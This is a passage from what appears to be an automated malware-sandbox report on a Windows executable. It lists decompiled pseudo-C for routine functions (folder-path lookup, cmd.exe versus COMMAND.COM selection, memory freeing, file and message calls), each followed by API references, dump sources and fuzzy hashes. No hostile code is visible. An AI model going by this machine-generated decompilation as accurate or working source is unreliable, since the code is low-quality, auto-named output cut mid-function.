					_t15 =  *0x6d68ac(0x6cd814, 0x8000, 0, _t56 - 4); // executed
					if(_t15 != 0) {
						if( *0x6d67dc == 0) {
							_t16 =  *0x6d6534; // 0x0
							E005C4EA4(_t16, _t56 - 0x38);
							E0040B4C8(0x6d6564, L"COMMAND.COM",  *((intOrPtr*)(_t56 - 0x38))); // executed
						} else {
							_t24 =  *0x6d6538; // 0x0
							E005C4EA4(_t24, _t56 - 0x34);
							E0040B4C8(0x6d6564, L"cmd.exe",  *((intOrPtr*)(_t56 - 0x34)));
						}
						E006AC180(); // executed
						_pop(_t48);
						 *[fs:eax] = _t48;
						_push(E006AC58D);
						return E0040A228(_t56 - 0x38, 0xd);
					} else {
						_push(_t56);
						_push(0x6ac516);
						_push( *[fs:eax]);
						 *[fs:eax] = _t57;
						E0040C8BC();
						_pop(_t53);
						 *[fs:eax] = _t53;
						_push(E006AC51D);
						_t32 =  *((intOrPtr*)(_t56 - 4));
						_push(_t32);
						L0043C214();
						return _t32;
					}
				} else {
					_push(_t56);
					_push(0x6ac4c3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t57;
					E0040C8BC();
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(E006AC4CA);
					_t37 =  *((intOrPtr*)(_t56 - 4));
					_push(_t37);
					L0043C214();
					return _t37;
				}
			}














                                                                    0x006ac487
                                                                    0x006ac48f
                                                                    0x006ac4da
                                                                    0x006ac4e2
                                                                    0x006ac524
                                                                    0x006ac54a
                                                                    0x006ac54f
                                                                    0x006ac561
                                                                    0x006ac526
                                                                    0x006ac529
                                                                    0x006ac52e
                                                                    0x006ac540
                                                                    0x006ac540
                                                                    0x006ac566
                                                                    0x006ac56d
                                                                    0x006ac570
                                                                    0x006ac573
                                                                    0x006ac585
                                                                    0x006ac4e4
                                                                    0x006ac4e6
                                                                    0x006ac4e7
                                                                    0x006ac4ec
                                                                    0x006ac4ef
                                                                    0x006ac4fa
                                                                    0x006ac501
                                                                    0x006ac504
                                                                    0x006ac507
                                                                    0x006ac50c
                                                                    0x006ac50f
                                                                    0x006ac510
                                                                    0x006ac515
                                                                    0x006ac515
                                                                    0x006ac491
                                                                    0x006ac493
                                                                    0x006ac494
                                                                    0x006ac499
                                                                    0x006ac49c
                                                                    0x006ac4a7
                                                                    0x006ac4ae
                                                                    0x006ac4b1
                                                                    0x006ac4b4
                                                                    0x006ac4b9
                                                                    0x006ac4bc
                                                                    0x006ac4bd
                                                                    0x006ac4c2
                                                                    0x006ac4c2

                                                                    APIs
                                                                    • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                                    • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                                    • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                                    • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FolderFreeKnownPathTask
                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                    • API String ID: 969438705-544719455
                                                                    • Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                                    • Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
                                                                    • Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                                    • Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC4CA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 47%
                                                                    			E006AC4CA() {
				void* _t10;
				intOrPtr _t11;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t36;
				intOrPtr _t41;
				void* _t42;
				intOrPtr _t43;

				_t10 =  *0x6d68ac(0x6cd814, 0x8000, 0, _t42 - 4); // executed
				if(_t10 != 0) {
					if( *0x6d67dc == 0) {
						_t11 =  *0x6d6534; // 0x0
						E005C4EA4(_t11, _t42 - 0x38);
						E0040B4C8(0x6d6564, L"COMMAND.COM",  *((intOrPtr*)(_t42 - 0x38))); // executed
					} else {
						_t19 =  *0x6d6538; // 0x0
						E005C4EA4(_t19, _t42 - 0x34);
						E0040B4C8(0x6d6564, L"cmd.exe",  *((intOrPtr*)(_t42 - 0x34)));
					}
					E006AC180(); // executed
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E006AC58D);
					return E0040A228(_t42 - 0x38, 0xd);
				} else {
					_push(_t42);
					_push(0x6ac516);
					_push( *[fs:eax]);
					 *[fs:eax] = _t43;
					E0040C8BC();
					_pop(_t41);
					 *[fs:eax] = _t41;
					_push(E006AC51D);
					_t27 =  *((intOrPtr*)(_t42 - 4));
					_push(_t27);
					L0043C214();
					return _t27;
				}
			}











                                                                    0x006ac4da
                                                                    0x006ac4e2
                                                                    0x006ac524
                                                                    0x006ac54a
                                                                    0x006ac54f
                                                                    0x006ac561
                                                                    0x006ac526
                                                                    0x006ac529
                                                                    0x006ac52e
                                                                    0x006ac540
                                                                    0x006ac540
                                                                    0x006ac566
                                                                    0x006ac56d
                                                                    0x006ac570
                                                                    0x006ac573
                                                                    0x006ac585
                                                                    0x006ac4e4
                                                                    0x006ac4e6
                                                                    0x006ac4e7
                                                                    0x006ac4ec
                                                                    0x006ac4ef
                                                                    0x006ac4fa
                                                                    0x006ac501
                                                                    0x006ac504
                                                                    0x006ac507
                                                                    0x006ac50c
                                                                    0x006ac50f
                                                                    0x006ac510
                                                                    0x006ac515
                                                                    0x006ac515

                                                                    APIs
                                                                    • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                                    • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FolderFreeKnownPathTask
                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                    • API String ID: 969438705-544719455
                                                                    • Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                                    • Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
                                                                    • Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                                    • Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004786AC, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004786AC(struct HWND__* __eax) {
				int _t3;
				struct HWND__* _t7;

				_t7 = __eax;
				_t6 = GetWindowLongW(__eax, 0xfffffffc);
				_t3 = DestroyWindow(_t7); // executed
				if(_t2 != L00414778) {
					return E004784F4(_t6);
				}
				return _t3;
			}





                                                                    0x004786ae
                                                                    0x004786b8
                                                                    0x004786bb
                                                                    0x004786c6
                                                                    0x00000000
                                                                    0x004786ca
                                                                    0x004786d1

                                                                    APIs
                                                                    • GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
                                                                    • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$DestroyLong
                                                                    • String ID:
                                                                    • API String ID: 2871862000-0
                                                                    • Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                                    • Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
                                                                    • Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                                    • Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406DF0, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00406DF0() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x006CFAE0;
				while(_t28 != 0x6cfadc) {
					_t2 = _t28 + 4; // 0x6cfadc
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x6c5084;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x6cfadc = 0x6cfadc;
				 *0x006CFAE0 = 0x6cfadc;
				_t26 = 0x400;
				_t23 = 0x6cfb7c;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x6cfb7c
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x6cfaf8 = 0;
				E00407760(0x6cfafc, 0x80);
				_t18 = 0;
				 *0x6cfaf4 = 0;
				_t31 =  *0x006D1B84;
				while(_t31 != 0x6d1b80) {
					_t10 = _t31 + 4; // 0x6d1b80
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x6d1b80 = 0x6d1b80;
				 *0x006D1B84 = 0x6d1b80;
				return _t18;
			}











                                                                    0x00406dfe
                                                                    0x00406e15
                                                                    0x00406e03
                                                                    0x00406e0e
                                                                    0x00406e13
                                                                    0x00406e13
                                                                    0x00406e19
                                                                    0x00406e1e
                                                                    0x00406e23
                                                                    0x00406e25
                                                                    0x00406e2a
                                                                    0x00406e2d
                                                                    0x00406e36
                                                                    0x00406e39
                                                                    0x00406e3c
                                                                    0x00406e3c
                                                                    0x00406e3f
                                                                    0x00406e41
                                                                    0x00406e44
                                                                    0x00406e49
                                                                    0x00406e4e
                                                                    0x00406e4e
                                                                    0x00406e50
                                                                    0x00406e52
                                                                    0x00406e52
                                                                    0x00406e55
                                                                    0x00406e58
                                                                    0x00406e58
                                                                    0x00406e5d
                                                                    0x00406e6e
                                                                    0x00406e73
                                                                    0x00406e75
                                                                    0x00406e7a
                                                                    0x00406e91
                                                                    0x00406e7f
                                                                    0x00406e8a
                                                                    0x00406e8f
                                                                    0x00406e8f
                                                                    0x00406e95
                                                                    0x00406e97
                                                                    0x00406e9e

                                                                    APIs
                                                                    • VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
                                                                    • VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                                    • Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
                                                                    • Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                                    • Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                                    • Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
                                                                    • Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                                    • Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004236FC, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                                    • Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
                                                                    • Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                                    • Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C857C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005C857C(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E0040A350(_t10, _t7, _t17, _t20);
			}








                                                                    0x005c8583
                                                                    0x005c859b
                                                                    0x005c85a3
                                                                    0x005c85a7
                                                                    0x005c85b0
                                                                    0x005c85a2
                                                                    0x005c85a2
                                                                    0x005c85a2
                                                                    0x00000000
                                                                    0x005c85b2
                                                                    0x005c85b2
                                                                    0x005c85b6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c85b6
                                                                    0x00000000
                                                                    0x005c85b0
                                                                    0x005c85c9

                                                                    APIs
                                                                    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FormatMessage
                                                                    • String ID:
                                                                    • API String ID: 1306739567-0
                                                                    • Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                                    • Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
                                                                    • Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                                    • Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C6808, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 31%
                                                                    			E005C6808(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x5c684e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E005C567C(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E0040B278(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E005C6855);
				return E0040A1C8( &_v8);
			}






                                                                    0x005c680b
                                                                    0x005c6812
                                                                    0x005c6813
                                                                    0x005c6818
                                                                    0x005c681b
                                                                    0x005c6823
                                                                    0x005c6831
                                                                    0x005c683a
                                                                    0x005c683d
                                                                    0x005c6840
                                                                    0x005c684d

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                                    • Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
                                                                    • Opcode Fuzzy Hash: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                                    • Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040D754(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
